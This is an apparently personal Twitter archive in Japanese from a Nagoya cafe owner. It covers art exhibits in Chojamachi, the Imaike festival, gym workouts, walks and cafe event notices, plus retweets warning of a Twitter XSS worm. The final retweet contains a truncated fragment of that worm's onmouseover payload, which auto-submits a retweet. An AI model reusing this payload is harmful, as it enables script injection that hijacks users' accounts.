Tue, Sep 21

  • 00:14  あいちトリエンナーレ長者町の展示を見に行ったよ。長者町、久々だなあ。ステキなカフェがいっぱいあるではないの。ゑびすビルがとても良かった。階段も雰囲気がよく。雑貨のお店のガラスのタンブラーに一目惚れ。着物のお店も良かったし。YEBISアートラボでバカルトさんの本を買った。
  • 00:20  本当にそうですよね。木の、古い建物にわくわくしました。長者町の展示も、正直言って展示自体よりも、それが置かれている古い建物内に入ることが楽しかったですよ。RT @cafe_ayaha ちょい前は桜アパートがそんな感じ?無いの淋しい〜。
  • 00:28  夕方からは今池祭りに行って来ました。すげー人だわなー。TOKUZOの森田さんは本当に大変だと思うのですが、今年もやっぱりいい顔で、ニコニコしながらあちこち走り回ってる。そして、いっぱいの人に会いました。
  • 00:44  あと、すっごい安いスーツの店に胸がキュンとしました!やっぱりバカルトさんの本は、うちの店になくちゃね。ってゆーか、買うの遅くなっちゃって恐縮ですー!RT @bakaruto お買い上げありがとうございます!長者町トリエンナーレ、面白いですよね。ダサダサのオジさんバッグが山積み
  • 09:26  なんつーかさあ、やりたいなあと思うことがいっぱいあるのよ〜。やりたいって言いつつ手をつけてないことばかりで、そーゆーのっていかんなあと思わないでもなかったけど、だんだんとねえ、あれがやりたいなあって思うことがあるだけでも、なんかシアワセ〜と思ったりするのね。
  • 09:28  もっと本もマンガも読みたいし映画も観たいしライブにもいっぱい行きたいし。でもこれは日常的にやってることで、手をつけてない「やりたいなあ」は語学と絵を描くことです。絵を描くことには私は激しいコンプレックスと同時に憧憬があるのです。
  • 09:38  21日(火)のcafeロジウラのマタハリ春光乍洩は定休日です。またのご来店を心よりお待ちしております。 #nagoya #meieki
  • 10:30  そうですよー。これもまたお店に置いて遠くから来たお客さんに東海地方のスバラシサを自慢したいと思います。RT @was69 おお、東海珍名所ですか? RT @mioririko: YEBISアートラボでバカルトさんの本を買った。
  • 10:43  さて9月26日(日)の夜は、チューバ奏者高岡大祐氏のソロ・ライブです。open 18:00 start 19:00 チャージ:¥2,500 (1ドリンク付き) 是非お待ちしております!
  • 18:36  正直、どうなることかとテンション下がってたけど、やっぱ楽しみだわ。メガ盛り!! RT @dogoon5 お待たせしました! ドグーン?の予告編が完成いたしました!!! 衝撃の予告編、チェックお願いします→ http://bit.ly/9SY3Y9 #dogoon
  • 18:49  今日は午前中にジムでサーキットトレーニングと筋トレ、有酸素運動などをしてきましたよ。スクワットの姿勢チェックの指導を受けたせいか、今日はもう足がへろへろです。
  • 18:51  今日も長者町円頓寺、または大須などの街歩きに出ようかと思ったのですが、疲れてしまったので夕方にご近所散歩。うちの近所にはきれいな川と、それから公園化してちょっとだけ森を残してある所があるのが魅力的です。
  • 18:54  ずっと歩いて、今日は藤が丘の街歩き。藤が丘は以前、仕事で毎日通る街でしたが、お店が本当に変わったなあ。なんだか店の前を通るだけにとても惹かれる、私の全く知らない居酒屋、カフェ、アジア料理店・・・。どの店にもそこを好きな人がいて、きっとドラマがあるんだよなあ。
  • 19:06  ヨリモ「発光地帯」はおすすめです。無料だけども会員登録要ります。https://yorimo.yomiuri.co.jp/csa/Yrm0504_P/1221729958657 @tyoknotyo 
  • 20:56  それは間違いなく、しりあがり寿の「ヒゲのOL薮内笹子」を目指してたんだと思いますっ!いい女っすよ、笹子。RT @was69 めっちゃ女装してた人がヒゲもじゃ。何を目指しているのか。
  • 20:57  RT @rna: 【警告】twitter.com のWebにセキュリティホールがあります。やたら長いリンクとか背景色がついたツイートとかを見たらツイートの上にマウスを持って行ったりクリックしたりしないでください!
  • 20:57  RT @udx: 【緊急RT】 ★注意★ RainbowTwtr という虹色のツイートを表示したものにマウスオンしたりフォローされていたりするとウイルス感染状態になりTLが白紙になる、つぶやきが消える、巨大文字が表示されるなどの被害がまさに今起きています。ブロックを!20 ...
  • 22:13  RT @Twitrotor: http://t.co/@"onmouseover="document.getElementById('status').value='RT Twitrotor';$('.status-update-form').submit();"clas ...

Powered by twtr2src